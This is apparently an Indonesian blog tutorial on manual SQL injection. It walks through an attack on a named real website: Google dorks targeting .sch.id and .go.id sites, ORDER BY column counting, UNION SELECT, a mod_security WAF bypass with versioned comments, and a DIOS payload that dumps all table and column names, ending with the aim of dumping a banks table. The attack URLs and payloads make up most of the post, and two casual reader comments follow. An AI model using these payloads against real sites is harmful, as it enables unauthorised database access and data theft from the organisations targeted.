Halo guys, sekarang gua mau share tentang SQL manual. Bagi yang ga tau SQL Injection itu apa, SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data (database) sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter karakter pelolos yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Ok langsung aja ke teknik nya
1. Dorking dulu
Nah bagi yang ga tau dork itu apa, google dork adalah fitur pencarian yang disediakan oleh google untuk mencari artikel yang berkaitan dengan query yang kita masukkan, nah dork yang umum adalah misalnya:
inurl: site.sch.id .php?id=
inurl: site.go.id php?id=
inurl: product.php?id=
Bagi yang ga tau cara dorking gimana :
Kalo udah tentuin dulu targetnya
Nah disini target gua seperti kemaren juga
https://mashailalqasr.com/eng/products.php?catid=1
Untuk mengecek nya, masukkan string ( ' ) dibelakangnya, Like this
https://mashailalqasr.com/eng/products.php?catid=1'
2. Order By
Terus kita cari jumlah kolomnya ada berapa dengan menambahkan order by dibelakangnya:
https://mashailalqasr.com/eng/products.php?catid=1' order by 1--+-
saat dilihat error, coba kita hapus ( ' ) dibelakang angka 1
https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+-
Dan hasilnya mulus, kita cari jumlah kolom nya lagi sampe nemu error, caranya;
https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 2--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 3--+- ~ Mulus
(Gua skip aja)
https://mashailalqasr.com/eng/products.php?catid=1 order by 36--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 37--+- ~ Nah ini Burik ini (error)
NB: kalo error di angka 40 dan angka 39 mulus, berarti jumlah kolom hanya sampai 39, kalo mau sekalian cek bisa di inject kolomnya atau ngga, langsung masukin aja order by 100 :v
Kolom 36 masih mulus, kita cek kolom 37
Nah ini burik namanya, langsung hantam aja!
3. Union Select
Caranya, tadi kan jumlah kolom hanya sampai 36, berarti kita masukin:
https://mashailalqasr.com/eng/products.php?catid=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Kalo udah, nanti bakal ada error not acceptable blablabla by mod_security, nah itu adalah WAF nya, hal itu biasa terjadi pas lagi mau inject target :v cara menembusnya pakai command ini:
Pengganti union select: /*!12345union*/+/*!12345select*/+
Jadinya kita masukin seperti Ini:
https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Result:
Nah, jangan lupa scroll ke bawah untuk liat angka togelnya, disitu angka togelnya adalah 5
Jadi yang kita pakai untuk ngintip basis data/database) nya terletak di angka 5. Langsung aja kita dump dengan menggunakan DIOS (Dump In One Shot)
DIOS: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
Jadinya seperti ini:
https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4, /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Nanti hasilnya seperti ini:
Untuk permisalan, gua mau dump, semisal gua mau dump tables banks nya :v
Ok, Sekian dulu kalo ada yang mau ditanyain silahkan di kolom komentar
Widih bang Demon
BalasHapusa en je a ye
Hapus